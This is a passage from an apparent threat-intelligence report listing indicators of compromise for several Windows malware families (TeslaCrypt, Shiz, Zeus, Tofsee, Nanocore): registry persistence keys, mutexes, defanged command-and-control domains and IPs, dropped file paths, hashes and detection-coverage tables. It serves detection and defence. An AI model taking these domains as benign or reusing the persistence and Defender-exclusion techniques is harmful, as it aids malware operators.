00ebcb2374583159529a8dcb4d27e851246914eacfd1a3cf12d2cbd73f064294 093389823f1de777d5601b06cd106ff4380e408c1c8b39ac11cbfd93353d6314 0d93c80c3af7d2121af1d853585efd98693a06d376fd13464b3f52ca159c4cf1 0d947efab08d1bfc21b5abd2734ddfdbeeb9cb1d29346670a0128f7a531c6547 0dcc6cf63dc618f450127306942d91f8404e6a2cdb8326412f93ad36a892e9bb 134fea9f96af3845790cd2f8ba6f0a93b208469ae1a592da0135234387ef9410 194acafcf8cb53f889a9d77c8fb2cf511b3c27a989f4ce5e91e55153583fe318 1ee9b6d5909664f7d6d247088033be88d56aa674af63ae751ea625d9768b144b 26ce967cffd3a8650b2475553ecf09333dd04068f840c0d9f5077909766648e7 304c9568e3381dc75ec2f853c19d1de4f47fb40cf55f12d48612631728cb9740 3368e5d1bf347cd4cd6df01e4f60491d747adf1545a4e9006f062adc08eb95a3 35a3111fa824abf5130d52c377999d15450a7018a93ca406d88ccfe3e0913712 4084b83687be14dd8c8a98026c810fb0961abf771c8827b4779872b276055249 43ed7041f9096db31d7dad4f9cff7d6cd00c1ccdce383421638f8847b6bc568e 450f32871f007b32bdd06b40d1804b6e67c5625121eb0b2adbd276c8f48c1434 4625ab6090ec735194bac9aa2ce1cfc7fe9ad3db30cd2a220f4e1d1368878fdf 46c753dd41ac83e7f2a8b1dda5c2d46eddbd1f42a2197843ed6f7dff817f5a8b 477d345de8b818c1d855ab9d64578c1b39915624926108e97b9a9e65b2696bbd 488f1209f28a4be1f9c4fb2798de2bbcef4e1c8949467eee0cc8546abbd663d0 491d36c6a9d19e3e37871e83ac2fa710020093a7105617c9e371b5f1a6099b38 4a11d5d14df0fbb67f813a7425b4a9be69c5a33b0cc930c3f3886374b57eee43 4aabb5ca1a96a55395e53d8dd17e27552319b14264efca554c1fc78bec39a589 4bc7ba250aa345e8c96f8df64e846aeca90f8add2db2f269bdf452843c574398 4f4e505d0f4b1dca299ac0cbd8749adb91994e144e314f11e7677a4dc91a2f30 503d20ae3e5d78acf6a367f1f1c2fc177683e8136a5571e5320c3834070c3e97
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.TeslaCrypt-9957356-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLinkedConnections
25
<HKCU>\SOFTWARE\XXXSYS 25
<HKCU>\SOFTWARE\XXXSYS
Value Name: ID
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
25
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 24
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
Value Name: data
24
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hdtjbroygvvb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: owvhajogulen
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pyfepfifrjwi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xbmnkkfnowvh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: gulenopvybnq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tbqdqvojagik
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hajogulenopv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mgtbqdqvcoqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ulenopvybnqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lpyfepfifrjw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: epfifrjwiqou
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ifrjwiqouteu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: teumgtbqdqvo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nrxbmnkkfnow
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: whmtlmoxvcsc
1
<HKCU>\SOFTWARE\159643D83772F 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bmnkkfnowvha
1
<HKCU>\SOFTWARE\159643D83772F
Value Name: data
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vcscusnnmyjx
1
Mutexes Occurrences
ityeofm9234-23423 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]6[.]161[.]162 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
jessforkicks[.]com 25
heizhuangym[.]com 25
infotlogomas[.]malangkota[.]go[.]id 25
csucanuevo[.]csuca[.]org 25
snibi[.]se 25
danecobain[.]com 25
www[.]danecobain[.]com 25
Files and or directories created Occurrences
%ProgramFiles%\7-Zip\Lang\ka.txt 25
%ProgramFiles%\7-Zip\Lang\kaa.txt 25
%ProgramFiles%\7-Zip\Lang\kab.txt 25
%ProgramFiles%\7-Zip\Lang\kk.txt 25
%ProgramFiles%\7-Zip\Lang\ko.txt 25
%ProgramFiles%\7-Zip\Lang\ku-ckb.txt 25
%ProgramFiles%\7-Zip\Lang\ku.txt 25
%ProgramFiles%\7-Zip\Lang\ky.txt 25
%ProgramFiles%\7-Zip\Lang\lij.txt 25
%ProgramFiles%\7-Zip\Lang\lt.txt 25
%ProgramFiles%\7-Zip\Lang\lv.txt 25
%ProgramFiles%\7-Zip\Lang\mk.txt 25
%ProgramFiles%\7-Zip\Lang\mn.txt 25
%ProgramFiles%\7-Zip\Lang\mng.txt 25
%ProgramFiles%\7-Zip\Lang\mng2.txt 25
%ProgramFiles%\7-Zip\Lang\mr.txt 25
%ProgramFiles%\7-Zip\Lang\ms.txt 25
%ProgramFiles%\7-Zip\Lang\nb.txt 25
%ProgramFiles%\7-Zip\Lang\ne.txt 25
%ProgramFiles%\7-Zip\Lang\nl.txt 25
%ProgramFiles%\7-Zip\Lang\nn.txt 25
%ProgramFiles%\7-Zip\Lang\pa-in.txt 25
%ProgramFiles%\7-Zip\Lang\pl.txt 25
%ProgramFiles%\7-Zip\Lang\ps.txt 25
%ProgramFiles%\7-Zip\Lang\pt-br.txt 25
*See JSON for more IOCs

File Hashes

11bf02df58d00bf7dfc22e46b27db8a2cfcb9c8d03ad38b2e3baafa193bbbd89 1a4a1e76c6d2dc585ce77c9be7163163c0d614d5668a0c83601bb3d6f91376a0 1c2ddbf956ee1e2b40472b70603371ed21817fbf95d5825b2f75bbf6f9728089 1d4114c8ee19f343f3dcf80a542295af29df63d9745ad77cce43562c909551c5 2f1f927c219ccfcffeb997c9433733a04200ae35a2fc0c48fc07cb49062cddc7 3ef3021ce3ffdffcfba2bd590c4186c3a3ecdd3b6ce40d51d2500897fb55ffb0 41ab6446df889a5a24e4e859146c0225d13a2ba8553c83cb93e45017212884b2 4bae8a4e0124724e695c10202a94eec99cf5990507fbc94ec3f08e11de3ce2c2 4dc12416bf7c3be9d573c8fa07847050307bd05cb67480e3c3874696614b73e9 4fa8c1eaa4846a8a06fb2480a746d5526f743cee314f7101db0508577bdd3776 5207a70e0e818741279d7c25c0d9cb6be136a4fc8ca8fe6f48112c4d0572d64f 5aaad74cb36db78ad6da4d499a75c41d2ace8b97ff8f88c5bc7f738ad353d3d7 67e2caf00dd0293080cb5b45d2db11d4f567ce9a3d6fd5c9723358d18da80e71 6a9e6e5c50b3b90376530ee4e9e81cdf5cdc9b7c07cdb71207b3a1799f77ec7a 6ab8f9569a70beb0f96bf4e030381e70bcce7703b308a05542f4ccf1b6002af9 71f0f23220cb0f5d8b31fce30f08bc1687acd675b7c3a8ae7e0538bacb0d3eec a3a6b4f405f2175af97128c64d9ad68700e05e22d66c43dad966add8436af79f a760b60722cfa7c719e79b5c97cfe789720c6300a200421c846e13287cdb160a d8be6b950a872b1b7c752cc83a5440b4cfe62870097df78794f10986fb7fcb63 dd6483183967845c18a3d5cc6154233aa8f3a48acb4e9cccd3606afe7d4d7eef de5dc2aed0e06894e0bb1292fb68343fadc46b489e6c85e6cca56cf5bad70c09 e1a00e6beb02475b4bdd8d821ccac3e67bbafd182332cbf35a45c6766ad83b87 e8c460f171e964db6fff16eb38684b9ec82134c4fd1a1cdc64ba338941ef1199 f69edf352cdca309c7faa71f87a429daf2b46e4ae6ed85a25ff03aa34b4702c4 fbcec257455e5546a294ec1534f7e11f05d144c73ef583a0e891e14759e133eb

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Shiz-9957241-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
23
Mutexes Occurrences
Global\674972E3a 23
Global\MicrosoftSysenterGate7 23
internal_wutex_0x000000e0 23
internal_wutex_0x0000038c 23
internal_wutex_0x<random, matching [0-9a-f]{8}> 23
internal_wutex_0x00000448 22
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 11
45[.]33[.]23[.]183 7
45[.]79[.]19[.]196 6
198[.]58[.]118[.]167 5
45[.]33[.]30[.]197 5
72[.]14[.]185[.]43 4
45[.]56[.]79[.]23 3
45[.]33[.]20[.]235 3
72[.]14[.]178[.]174 3
96[.]126[.]123[.]244 2
45[.]33[.]2[.]79 2
45[.]33[.]18[.]44 2
85[.]94[.]194[.]169 1
173[.]255[.]194[.]134 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
fotaqizymig[.]eu 23
cidufitojex[.]eu 23
xukuxaxidub[.]eu 23
digofasexal[.]eu 23
gatuvesisak[.]eu 23
lyvywyduroq[.]eu 23
qetekugexom[.]eu 23
puvacigakog[.]eu 23
xuboninogyt[.]eu 23
cicezomaxyz[.]eu 23
dixyjohevon[.]eu 23
fokisohurif[.]eu 23
volugomymet[.]eu 23
maganomojer[.]eu 23
jefecajazif[.]eu 23
qedylaqecel[.]eu 23
nojotomipel[.]eu 23
rytifaquwer[.]eu 23
kepujajynib[.]eu 23
tuwaraqidek[.]eu 23
xuqeqejohiv[.]eu 23
pumebeqalew[.]eu 23
cinycekecid[.]eu 23
divulewybek[.]eu 23
nozulufynax[.]eu 23
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 23

File Hashes

00180daca1b8b50f272a020eee54d9fa90094881d1d5ac3cfd9b8ef75cf1e6f4 0782fb4469241b17dacdb3040403425c5dfa726afe7608695d798c40ba0468df 096567f0324ce9d8dafbd8b2fa07baa4c024e734cee78966a2e1bda01cc6aab1 0b575be1b7f34effd28837fcbd89afb217202ce9dc99c23bd59d858343a2cebe 0b579d7b50d2036a46977367a6673faf3e7c1861f30138f19cfc64e2240f7ef4 0e4553fcdf4b905c069986826b4190fae4c301a72a31d84f70ebc82a3a4e08d2 10845e4f34b629a880154930d82e6533e4f2988ff7f8d190da77258b04c53a33 1422cdfe1c27c71dc5cac99bc1b94da21730d123c84808fb275a0a9ad4608ea6 1613108f8d6a07cf52c9342e2bc34ef95c142ccd0945e8863876499f373ee276 1a1075298b76367a0f09e1d32a33f3795d7fcedfbf562f8e97a73fd84b044d44 1a776926ba733dd76ac52335f28bca9f834eb424b9c3344e18c53be7bc488e16 1b2b7d611569a0ed98e7c8592b1ab68f89e5f9b9bb46004f40ab8e238da58c68 1b658f725eccb4d5b15339017f834e54e03280757ef214f98ebf7c02584b1259 1cafff0eb6f9b746d49ce3e6b29dc0581145df229089c43f234693a7f3c01911 1d6a5170f8caf1bac36b69953b6df43da07b1b5fbd2c6c135146edfb975d6c0d 1e12db0b8596f9b40eb120f663796ea2067a5af27fdc9c892d4ffdb042a88df7 1f16c27403f51502cd5cb7b15eac5e53c23b8f8d25f647ebc216cf5f2e57940a 206ffd6d82b9934e50b1de5555e5a544353f4dd8c59c7fe4c8c501024fc12438 25c3635d6874809bb1163763187c72f827756d773cca5aaf93d288015275ba50 27f644aed21754919d8236e2ec0c07ac85a65694a4c2eab289cef54905460545 2a01ca9a1bedc3d53bf5514fb3e3c62275aba7d4536c806a227f83b3265458d0 2a7755e96cff2e3186fde0936b3cf86648f242a5d9c0c3ba8903852905a5bfbf 2bb61e2487b38915a8a0a5b46ea26ea16b931a09a0acd9fe93fe58f63608caa5 2be38d866007d818551826d7b4eb1187f0a2e881634caa08d281ad11fed50b8f 2c77f57754219ee31db301679821ce62e0f2ba5326c04cc0685c53b7135c5a24
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Zeus-9957126-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\XODYUZ 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Savyomzauc
1
<HKCU>\SOFTWARE\MICROSOFT\XODYUZ
Value Name: Seroymo
1
Mutexes Occurrences
GLOBAL\{<random GUID>} 1
Local\{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
199[.]2[.]137[.]201 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
wearesofamousthatwestayontop[.]com 1
sunobowttteek2[.]biz 1
Files and or directories created Occurrences
%TEMP%\tmp8f23b8f6.bat 1
%APPDATA%\Axfo 1
%APPDATA%\Axfo\ycner.elz 1
%APPDATA%\Ebyhvo 1
%APPDATA%\Ebyhvo\feyn.exe 1
%APPDATA%\Iqxa 1
%APPDATA%\Iqxa\oviku.ibc 1

File Hashes

01e483b094b3112e7cec3c76f73158d4b1897dedabef0bc03cdfe2e8fcfa7e9e 0439391736bebd073343fa84a894df1729747504cd228bea68b0657c4912bfcf 04b75511bf54e30bb62c43021b92070444fcaae9a6f461339efb112eb1ee9154 1308d38b43ffa2dca4d4a86d80cc69e14608c4f0f8e91c422ecbaf4886d088b2 182cc0c11d4cd6193428bd463b14df9b00bb2f69c351790142d660ed7d0f446b 1849049071f08094dc3b8fd471a77df1d4a06583e1a118bcdcf9668990ae4bf0 1fe334f9fb9b43a9a4ab48df2cf6612037bb12dd4b614379766567cfa70a788e 2580d43c6b5a0ce5556bce9857ebb208be8f3bc82705b1cd9df990cca3bea01d 2b14c895108d261f1dfa2ee718cda6c9aadf85540469c870d5c5ad8b10357a30 4248058bec9172b47b4b55e51a06f9bf57d9e848f35f0c0b42695ce9d66c0fab 43d0cbec39e4b9b041353774272484ed5074ec6dfd4a6fbd090a8a4ba3408b8b 517770a8a2092e068ad8d3eafb35039542500297426aab7be084eb7688639093 5ee6e167282e0c6917d36029e08cddf2d4d05121c48b4700782534427c72ce0b 623bcd68d0f7827540471935161c4d5094c3a88965f186a1492822ffb3ff1f18 6bbe78119dac51783873c433e28a5d24851b6fe7da23c822ec2ace75fd9c4153 702808b62a234ddbdb1d48c904ea6028d63f2d69782cc1e5ee5fe7c18e732376 79cbbb34180a74893002d4532e8310bc44a0718a3b990e866e1f4ad3ba82765a 807dea0f6d360b8de2df42defa29edf406b3596e78afca618ea984b2b9396272 8245c00bc1c311baba9ca23653af3432e2d8a084309c32dbc04da5adbf17bea8 8703fccdeecb0ce3afa979c06385e7e9d4361272aa2999c5f1eeba9ee9d6c174 99acfdfb1b763979e7507c245cc25849c09fa5bfcbf830b3f6d7638663e8f772 9b0f72b4ba66d99726123b379fed030b9257281b9f493e15b21e5dbc0b1b392e a546480f68c4789f6630260b515e30ba27d53cdb256d186018c29ab89c279f8b a70d2c24cc882a37161aed809bb1311edfe9fabfecb3496872884de46bcd30f2 a7dfcc11b3d17fa4f66cfc5bd08872f286705056bf283fca4e3bb3b4310ef407
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Tofsee-9957067-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nxzuqihd
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\eoqlhzyu
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TDFAWONJ 1
Mutexes Occurrences
Global\07ada3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\067cf3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\08e8d341-08f4-11ed-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
212[.]77[.]101[.]4 4
142[.]250[.]72[.]100 4
31[.]41[.]244[.]82 4
31[.]41[.]244[.]85 4
80[.]66[.]75[.]254 4
80[.]66[.]75[.]4 4
31[.]41[.]244[.]128 4
31[.]41[.]244[.]126/31 4
185[.]165[.]123[.]13 4
208[.]71[.]35[.]137 3
208[.]76[.]51[.]51 3
216[.]146[.]35[.]35 3
199[.]5[.]157[.]131 3
208[.]76[.]50[.]50 3
195[.]46[.]39[.]39 3
23[.]90[.]4[.]6 3
194[.]25[.]134[.]8 3
144[.]160[.]235[.]143 3
193[.]222[.]135[.]150 3
209[.]244[.]0[.]3 3
119[.]205[.]212[.]219 3
67[.]231[.]152[.]94 3
31[.]13[.]65[.]174 3
117[.]53[.]116[.]15 3
172[.]253[.]115[.]26/31 3
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 4
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 4
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 4
249[.]5[.]55[.]69[.]in-addr[.]arpa 4
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 4
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 4
microsoft-com[.]mail[.]protection[.]outlook[.]com 4
microsoft[.]com 4
www[.]google[.]com 4
whois[.]arin[.]net 4
whois[.]iana[.]org 4
aspmx[.]l[.]google[.]com 4
wp[.]pl 4
ameritrade[.]com 4
mxa-000cb501[.]gslb[.]pphosted[.]com 4
mx[.]wp[.]pl 4
svartalfheim[.]top 4
www[.]instagram[.]com 3
mta5[.]am0[.]yahoodns[.]net 3
hanmail[.]net 3
freenet[.]de 3
korea[.]com 3
t-online[.]de 3
o2[.]pl 3
nate[.]com 3
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 4
%SystemRoot%\SysWOW64\config\systemprofile:.repos 4
%SystemRoot%\SysWOW64\nxzuqihd 1
%SystemRoot%\SysWOW64\eoqlhzyu 1
%SystemRoot%\SysWOW64\tdfawonj 1
%SystemRoot%\SysWOW64\hrtokcbx 1
%TEMP%\oacsevkh.exe 1
%TEMP%\htrzurov.exe 1
%TEMP%\rzwntxyj.exe 1
%TEMP%\mcilsztg.exe 1

File Hashes

1b64011f2f80b0ded096cbdb81c2bdac9786dc8a4ea7425b15547bdca34e043f 34c17bb102b2ed718471668da1ddc7daf397175979582942bf89d8e272cfa141 59bdcd1599938f1c5c2845d1fef198a0d97b03744432fc6705c9c67f13eedab4 64d6709c3cfbf8765e9434abfe6fc8bad67d87a3e4fe0622e68aa1d15aac8d6b 6857bce2c5f73e1d1bc4b14cb7b281beb33fed8cb580a43f236460c2af0e65e2 6eb7dd7f943a22822b0aaef6301d32b54eb43e432070c41b7d3c6a3d041ec8b3 6f3ef01ce9f2896b54c06fe4cd5e5769dda3a958868557a20469feb21c7e1273 79699aa58081b925c0b75140f0110f3ebf9a47e9bc8ba1699d53d7b14cb49591 7e2975f6cb11bb324bd49ec6fd4b77478e3488bf99fe623851a29f06e9b1fb37 89974e5d8be578da3cc6c0a33398659aabb160cdb03f7158066969f430dab796 9449f5dd9a6728664a3be973ccb91adbf64ffe980ff96de05a0419eb0a77bbd7 b77c2b3942f50e8fef2440481de894d506418f7a7c35fb29d40cfa8ce795ebf4 cbbc899843ca8f5908c27645960a33952fbecbf3d5cefc5054ab1dd023bb8582 d0596ec9d08cdd81f86e07d5ab70b518c6ca23a9ed4f557d041d3307b3ca7020 d518bbcb40208cfd7cbb6965e1647fabd5f65f2f1c1520e1217996957a1ada8d e6411e18f8a1096f9b5d7528a24f6acdf1f97d120dd0dae4d76703c8eb5e4040 efced050e17235d050db86e0d763a07cfff375771d586736bbd17520725f1ebf

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Nanocore-9957022-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\WINRAR SFX
Value Name: C%%Users%ADMINI~1%AppData%Local%Temp
9
<HKCU>\SOFTWARE\WINRAR SFX 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
4
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195 2
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195
Value Name: 7E3975E4EF230D7D9195
2
Mutexes Occurrences
Global\{8c60c66e-3013-47af-8bbe-7df02dd28d12} 4
Global\Protect7d723a8e.dll 2
\x6f21\x705\x43\x8f323\x746a3\xb096e\x27\x99491\xfa05\xe581\x7c\x22\x199\x3b2f\x1a33\x92ec\x7e\x4b\x55\x5b8c1\xa5894\x10e\x21a1\x4f\xfeaaf\x36a\x466\x78a\x1670\x1e3\x9f\x4a3\xe19a\x3c2\x253bd\x79\x7e\x6ce\x3a\x768\x1ae2\x36\x1bd43\x2ec0a\x58e\x75\x1994\x3bd\x25\x74c\xd0e0e\xfff90\x99de\x66a\x4c\x343\x5a554\x6a\x157\x3a\x39\x231\xb1cb0\x415\xe25f\x799\xd31\x57\x61e\x78678\x62\x1db\xc42cb\x314fd\x7e8\x748\x1bf1\xd40d\x3c9\xff4a\x34\x1ce54\x24\x3a33\xd89ea\x1a44d\xa08a7\x415\x62\x10e\x381\xd5\xbb640\x53c3\xea65\x34c\x74\x3d5e4\x4f\xf1948\x42050\xcb0fc\x46\x41e\x742d\xa328\x256\x3a\xfffd\xccc7\x14b54\x5a\x5c7\xa9ef7\x5ab\x7b\x10b246\x32123\x86f8\x77\x662\x41c3\x6bf9\x4a9\x367\x76\x328\x66e\xdfbe8\x424ec\x4239\x45\x87d0e\x8b461\x63\x6c9\xa8344\x65\xba571\x2d5a5\xc4236\x5d\x438f\xd2\x31\x6bb\x45\xb5d8d\x6d69f\x14ee6 2
Global\11971d21-08aa-11ed-b5f8-00501e3ae7b6 1
Global\15c3b7a1-08aa-11ed-b5f8-00501e3ae7b6 1
Global\1bb73741-08aa-11ed-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
74[.]139[.]80[.]187 6
145[.]14[.]144[.]94 1
145[.]14[.]144[.]171 1
145[.]14[.]145[.]198 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
wirelock[.]000webhostapp[.]com 3
Files and or directories created Occurrences
%TEMP%\RarSFX1 10
%TEMP%\RarSFX0 10
%TEMP%\RarSFX2 5
%ProgramFiles(x86)%\AGP Manager 4
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 4
%TEMP%\RarSFX3 3
%TEMP%\RarSFX1\BouncyCastle.Crypto.dll 3
%TEMP%\RarSFX1\Google.Protobuf.dll 3
%TEMP%\RarSFX1\JLibrary.dll 3
%TEMP%\RarSFX1\MySql.Data.dll 3
